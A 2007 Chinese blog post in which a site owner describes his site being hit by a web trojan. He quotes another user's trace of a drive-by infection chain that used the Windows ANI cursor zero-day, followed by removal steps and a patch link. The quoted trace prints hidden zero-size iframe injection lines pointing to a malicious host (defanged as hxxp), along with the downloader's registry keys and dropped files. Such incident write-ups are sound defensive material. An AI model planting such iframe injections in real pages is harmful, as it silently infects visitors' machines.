pp.900666.com中招第2天
上一篇 / 下一篇 2007-05-07 07:52:15 / 个人分类:网站历程
昨天说到咨询网(www.nnask.com)被挂木马,被迫把好多文件删除,昨天一晚上没有关机,把所有程序下载回本地,一检查安全得很(白删除了很多东东),很明显是服务器机房存在arp欺骗了。
继续在网上搜索相关资料,一网友domino发表的文章:
cnBeta 今晚被掛馬! 微软鼠标指针0-day
今天要進去網站逛發現網站都進不去。
卡8禿然出現警告! 看了一下網頁..發現是 微软鼠标指针0-day(Exploit.Win32.IMG-ANI.ac)..
首頁(典型的網馬方式)
<iframe src=hxxp://pp.900666.com/b.htm width=0 height=0></iframe>
轉進去 b.htm 後~會出現假的(无法显示网页)
~而在假的網頁源碼發現使用同樣方式網馬躲藏位置
<IFRAME src="hxxp://pp.900666.com/11/1.htm" width=0 height=0></IFRAME>
進入1.htm 之後~看到網頁標題寫著..<title>super IE 0Day</title> 然後自動轉跳到
hxxp://pp.900666.com/11/logo.htm
從logo.htm網頁源瑪中看到這網馬
<META http-equiv=Content-Type content="text/html; charset=US-ASCII"></HEAD>
<BODY><LINK href="GnYiVsAQ.CSS" rel=stylesheet></HTML? body <></BODY>
利用CSS偽裝.. 下載下來看看
hxxp://pp.900666.com/11/GnYiVsAQ.CSS
從GnYiVsAQ.CSS 得到 網馬最後位置
hxxp://pp.900666.com/11/YuiAnLQvZx.asp?id=1
木馬現形 (is a Trojan Trojan-Downloader.Win32.Delf.bho)
hxxp://pp.900666.com/down.exe
病毒名称: Trojan-Downloader.Win32.Delf.bho
中文名称: 下载者变种
病毒类型: 木马类
文件 MD5: 54416CD0214109236F61339C138BA5B2
公开范围: 完全公开
危害等级: 4
文件长度: 加壳后 16,602 字节,脱壳后113,152 字节
感染系统: Win9X以上系统
开发工具: Borland Delphi 6.0 - 7.0
加壳类型: Upack 0.3.9 beta2s -> Dwing
命名对照: BitDefender [Generic.Malware.WBdld.2BFD9495]
手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 使用 进程管理关闭病毒进程:
IEXPLORER.EXE
(2) 删除并恢复病毒添加与修改的注册表键值:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer\run\wm
Value: String: "%WINDIR%|Syswm6\svchost.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run\svc
Value: String: "C:\DOCUME~1\antiy\LOCALS~1\Temp\ie777.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\cmdbcs
Value: String: "%WINDIR%|cmdbcs.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\mppds
Value: String: "%WINDIR%|mppds.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\msccrt
Value: String: "%WINDIR%|msccrt.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\shualai
Value: String: "%WINDIR%|shualai.exe /i"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\upxdndq
Value: String: "C:\DOCUME~1\antiy\LOCALS~1\Temp\upxdndq.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\winform
Value: String: "%WINDIR%|winform.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Exporer\ShellExecuteHooks\
{DD7D4640-4464-48C0-82FD-21338366D2D2}
Value: String: ""
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\
{DD7D4640-4464-48C0-82FD-21338366D2D2}\InProcServer32\@
Value: String:
"C:\Program Files\InternetExplorer\MoWang.tdm"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\
WindowsDown\Description
Value: String: "Windows XP"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\
WindowsDown\DisplayName
Value: String: "Windows XP"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\
WindowsDown\ImagePath
Value: Type: REG_EXPAND_SZ Length: 31 (0x1f) bytes
%WINDIR%|System32\servet.exe.
(3) 删除病毒释放文件:
%WinDir%\cmdbcs.exe
%WinDir%\mppds.exe
%WinDir%\msccrt.exe
%WinDir%\shualai.exe
%WinDir%\winform.exe
%System32%\8.exe
%System32%\cmdbcs.dll
%System32%\mppds.dll
%System32%\msccrt.dll
%System32%\servet.exe
%System32%\shualai.dll
%System32%\winform.dll
%ProgramFiles%\Internet Explorer\MoWang.sys
%ProgramFiles%\Internet Explorer\MoWang.tdm
根据资料检查我的电脑,没有中招,还好,打了微软ani补丁,再次附上补丁下载地址:“下载微软ani补丁”
| 网 址: | http://download.microsoft.com/download/5/8/3/58324bce-00c5-42b7-bd05-1353c0604dab/WindowsXP-KB925902-x86-CHS.exe |
| 注 释: | 光标漏洞微软官方补丁 美国当地时间2007年4月3日,微软发布了安全更新程序MS07-017,修复了Windows GDI处理的7个漏洞。最近被黑客滥用的动态光标处理漏洞(ANI)也在其中,也是严重等级最高的一个。 |
现在情况已报空间商,希望能尽快解决咨询网的问题
TAG:
